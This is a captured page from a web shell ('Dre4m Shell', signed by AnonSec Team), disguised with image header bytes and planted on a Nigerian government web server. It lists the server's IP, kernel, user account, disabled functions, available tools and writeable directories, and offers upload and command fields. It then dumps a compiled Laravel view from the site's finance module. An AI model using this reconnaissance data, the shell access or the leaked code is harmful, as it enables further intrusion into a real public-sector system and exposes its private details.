ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 18.222.74.68
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/grp.nicn.gov.ng/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/grp.nicn.gov.ng/storage/framework/views/01cb73830fe7668f62fd0ec4e191ba0ec72467cf.php
<?php $__env->startSection('pageTitle'); ?>

<?php $__env->stopSection(); ?>

<?php $__env->startSection('content'); ?>

<div class="box box-default" style= "border:none;">
        <div class="box-header with-border hidden-print">
          <h3 class="box-title"><?php echo $__env->yieldContent('pageTitle'); ?> <span id='processing'></span></h3>
        </div>
        <?php if($warning<>''): ?>
	<div class="alert alert-dismissible alert-danger">
	<button type="button" class="close" data-dismiss="alert">&times;</button>
	<strong><?php echo e($warning); ?></strong> 
	</div>
	<?php endif; ?>
	<?php if($success<>''): ?>
	<div class="alert alert-dismissible alert-success">
	<button type="button" class="close" data-dismiss="alert">&times;</button>
	<strong><?php echo e($success); ?></strong> 
	</div>
	<?php endif; ?>
    <?php if(session('err')): ?>
        <div class="alert alert-dismissible alert-danger">
    	<button type="button" class="close" data-dismiss="alert">&times;</button>
    	<strong><?php echo e(session('err')); ?></strong> 
    	</div>                        
    <?php endif; ?>
    <?php if(session('message')): ?>
        <div class="alert alert-dismissible alert-success">
    	<button type="button" class="close" data-dismiss="alert">&times;</button>
    	<strong><?php echo e(session('message')); ?></strong> 
    	</div>           
    <?php endif; ?>
	<?php if(count($errors) > 0): ?>
                    <div class="alert alert-danger alert-dismissible" role="alert">
                        <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span>
                        </button>
                        <strong>Error!</strong> 
                        <?php $__currentLoopData = $errors->all(); $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $error): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                            <p><?php echo e($error); ?></p>
                        <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                    </div>
                <?php endif; ?>
                
                <div class="box-body">
 
 <?php echo $__env->make('layouts.allReportHeader', ['companyName'=>'defaultName', 'companyAddress'=>'defaultAddress', 'title1'=>'Monthly Allocation Recieved', 'title2'=>'', 'showOnlyTitle1'=>1, 'showOnlyTitle2'=>0, 'hideLogos'=>0, 'hideAddress'=>0], \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?>
 
	<form method="post"  id="thisform1" name="thisform1" >
		<?php echo e(csrf_field()); ?>

		<div class="box-body">
			<div class="row hidden-print">
        		<div class="col-md-3">          
                    <label class="control-label">Budget Type</label>
                    <?php if (old('economicGroup') !='') {$economicGroup=old('economicGroup'); } ?>
                    <select class="form-control" id="economicGroup" name="economicGroup" onchange="ReloadForm()" required="">
                        <option value=""  >-Select-</option>     
                        <?php $__currentLoopData = $EconomicGroup; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $list): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                        <option value="<?php echo e($list->ID); ?>" <?php echo e(($economicGroup) == $list->ID? "selected":""); ?>><?php echo e($list->contractType); ?></option>
                        <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                    </select>
                </div>
        	<div class="col-md-2">
    				<br>
    				<button type="submit" class="btn btn-success">
    					<i class="fa fa-btn fa-refresh"></i> 
    				</button>						
				</div> 
	        </div>
	            	 
    		<div class="row">
				
    		</div>
		<input id ="delcode" type="hidden"  name="delcode" >
		</div>
			<div class="table-responsive" style="font-size: 12px; padding:10px;">
			<table class="table table-bordered">
			<thead>
				<tr >
			               	<th ></th>
			                	
			                <th >Debit</th>
			                <th >Credit</th>
			                <th >Amount</th>
			                <th >Action</th>
			                
			 	</tr>
			</thead>
						<?php 
						$serialNum = 1; 
						$bf=0;
						$tr=0;
						$ta=0;
						?>
						
						<?php $__currentLoopData = $UnsettleFund; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $b): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> 
							<tr>
								<td><?php echo e($serialNum ++); ?> </td>
								<td style="text-transform:capitalize;"><?php echo e($b['debit']); ?></td>
								<td style="text-transform:capitalize;"><?php echo e($b['credit']); ?></td>
								<td style="text-align:right;"><?php echo e(number_format(abs($b['amount']),2)); ?></td>
								<td ><button type="button" class="btn btn-primary fa fa-edit" onclick="Refund('<?php echo e($b['debitid']); ?>','<?php echo e($b['creditid']); ?>','<?php echo e(str_replace("'", "", $b['debit'])); ?>','<?php echo e(str_replace("'", "", $b['credit'])); ?>','<?php echo e(abs($b['amount'])); ?>' )" class="" id=""> Refund</button></td>
							</tr>
							<?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>	
						
							
			 </table>
			 <button class="print hidden-print" type="submit" >Print</button>
		</div>
	</form>
<div id="editModal" class="modal fade">
 <div class="modal-dialog box box-default" role="document">
  <div class="modal-content">
    <div class="modal-header">
      <h4 class="modal-title">Refund  </h4>
      <button type="button" class="close" data-dismiss="modal" aria-label="Close">
        <span aria-hidden="true">&times;</span>
      </button>
    </div>
    <form class="form-horizontal" id="editBModal" name="editBModal" role="form" method="POST" >
            <?php echo e(csrf_field()); ?>

    <div class="modal-body">  
        <div class="form-group" style="margin: 0 12px;">
            <label class="control-label">Debit</label>
            <input type="text" class="col-sm-9 form-control" id="debit"  readonly="">  
        </div>
        <div class="form-group" style="margin: 0 12px;">
            <label class="control-label">Credit</label>
            <input type="text" class="col-sm-9 form-control" id="credit" readonly="">   
        </div>

        <div class="form-group" style="margin: 0 12px;">
            <label class="control-label">Amount</label>
            <input type="text"  class="col-sm-9 form-control" id="amount" name="amount" >   
        </div>
        <div class="modal-footer">
		<input type="hidden" id="debitid" name="debitid">   
		<input type="hidden"  id="creditid" name="creditid">   
            <button type="Submit" name="save" class="btn btn-success">Save changes</button>
            <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button>
        </div>   
    </div>
    </form>
</div>
</div>
</div>	
</div>
<?php $__env->stopSection(); ?>

<?php $__env->startSection('styles'); ?>
<link rel="stylesheet" type="text/css" href="<?php echo e(asset('assets/css/datepicker.min.css')); ?>">
<?php $__env->stopSection(); ?>

<?php $__env->startSection('scripts'); ?>
<link rel="stylesheet" type="text/css" href="<?php echo e(asset('assets/css/datepicker.min.css')); ?>">
<link rel="stylesheet" type="text/css" href="https://cdn.datatables.net/1.10.19/css/jquery.dataTables.min.css">
<link rel="stylesheet" type="text/css" href="https://cdn.datatables.net/buttons/1.5.2/css/buttons.dataTables.min.css">

<style>

.table tr th
{
text-transform:uppercase;
font-size: 14px;
}
.table tr td
{
font-size: 14px;
}

</style>

<script src="<?php echo e(asset('assets/js/jquery-ui.min.js')); ?>"></script>

<script src="https://cdn.datatables.net/1.10.19/js/jquery.dataTables.min.js"></script>
<script src="https://cdn.datatables.net/buttons/1.5.2/js/dataTables.buttons.min.js"></script>
<script src="https://cdn.datatables.net/buttons/1.5.2/js/buttons.print.min.js"></script>

<script>
$('.print').click(function()
{
window.print();
});
</script>
  <script type="text/javascript">
	function  ReloadForm()
	{
	document.getElementById('thisform1').submit();
	return;
	}
    function Refund(debitid,creditid,debit,credit,amount)
      {
        $('#debitid').val(debitid);
        $('#creditid').val(creditid);
        $('#debit').val(debit);
        $('#credit').val(credit);
        $('#amount').val(amount);
        $("#editModal").modal('show');
      }
  
  </script>
  
<?php $__env->stopSection(); ?>

<?php echo $__env->make('layouts.layout', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?><?php /**PATH /home/nicngo5/grp.nicn.gov.ng/resources/views/allocation/unsettledlendingborrow_report.blade.php ENDPATH**/ ?>

Anon7 - 2022
AnonSec Team